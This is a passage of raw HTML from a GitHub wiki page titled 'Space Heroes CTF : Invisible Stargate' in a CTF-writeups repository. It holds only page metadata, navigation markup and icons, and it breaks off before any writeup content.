not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8182:1F9B:4C6CA3E:4E81015:64121B99" data-pjax-transient="true"/><meta name="html-safe-nonce" content="90c8785a3ee67d3b157918a88577199da97dead49ea33d0c1e2c45da5c86fc68" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTgyOjFGOUI6NEM2Q0EzRTo0RTgxMDE1OjY0MTIxQjk5IiwidmlzaXRvcl9pZCI6IjQxNTQyMDM4NDE5NTEzMDg2OTciLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="367bad67b4d2e592b18385c043ddf828c3cfd13df082e1ba5674fe1348449a42" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Space Heroes CTF : Invisible Stargate" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Space Heroes CTF : Invisible Stargate" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="XNaagoubZw6rn3o5UG7SHU86OA2VZnkEuYrsxTu0LPB/dx420DznnLpNJDlPEnttlVXErOpvysufYcUl0ToKOw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 